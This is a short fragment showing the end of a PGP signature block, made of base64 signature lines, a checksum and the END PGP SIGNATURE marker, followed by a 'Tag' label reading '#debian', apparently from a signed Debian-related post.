5W2EDoshUKHbMznmDsB98ByOglVK671mAyyb5ycfb3deXnpYX3fDWSBCBBBzKTgX  
W7xSSK0gFb/GLaHl7vmK4bjKv0qrTBDlEX+d84lI6f+zYwOBFyU+u3fITyKPCMp8  
SqPUfdNg77Ijco7YKZdofi9U549uqqKW8dT5HMZglo8yG1H8w/7LFG+Df8hZ+dp4  
qJQ7tYBEZP8J4XlY1btaPE6F9JKqZSkvUW5jPmFNzfU/Apb0b0dvnfFRr0/BhkFL  
0fYxClI1C61qRavE+mqYjt1o9+IwZdS6tBxReZG15D+XoMvdFf0=  
=8EOr  
-----END PGP SIGNATURE-----

Tag

#debian